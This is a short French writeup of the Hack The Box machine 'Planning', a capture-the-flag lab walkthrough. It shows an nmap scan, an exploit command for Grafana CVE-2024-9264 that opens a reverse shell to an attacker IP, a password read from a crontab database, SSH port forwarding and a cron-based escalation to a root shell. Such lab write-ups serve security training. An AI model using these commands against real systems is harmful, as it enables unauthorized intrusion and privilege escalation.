Bannière Planning

HTB - Planning

Introduction

Bienvenue sur ce nouveau writeup. Aujourd’hui, on s’attaque à la machine Planning sur Hack The Box. Une machine fraîchement sortie dans l’arène publique.

Planning intro

Scan initial

nmap -sCV [IP] --min-rate 9600 -p- -T5 -vv

Ports ouverts :

Nom d’hôte découvert : planning.htb (à ajouter dans /etc/hosts)

Exploration Web

Site principal

Pas d’élément exploitable évident. On passe à la recherche de sous-domaines avec les wordlists Bitquark de SecLists.

Subdomain discovery

Un sous-domaine intéressant est découvert et ajouté à /etc/hosts.

Sous-domaine Grafana

Exploitation Grafana

Version détectée : Grafana v11.0.0

Exploit public trouvé :

CVE-2024-9264 - RCE Grafana Exploit Grafana
python3 poc.py --url http://grafana.planning.htb --username [USER] --password [PASS] --reverse-ip [ATTACKER] --reverse-port [PORT]

Post-exploitation & SSH

Utilisation de linpeas pour l’énumération locale :

LinPEAS

Connexion SSH avec l’utilisateur enzo :

ssh enzo@planning.htb
SSH Enzo

Élévation de privilèges

Lecture du fichier /etc/crontabs/crontab.db pour récupérer un mot de passe.

Redirection de port :

ssh -L 8000:localhost:8000 enzo@planning.htb

Accès à l’interface web sur http://localhost:8000 pour créer une tâche :

Tâche cron

Retour dans la session SSH :

/bin/bash -p
Root shell

Conclusion

Machine compromise avec succès. Une belle démonstration d’exploitation d’un service exposé (Grafana) et d’une élévation via cron web UI.

Machine rootée
Accueil Retour

Remerciements

Thanks, Artemis Community 🛡️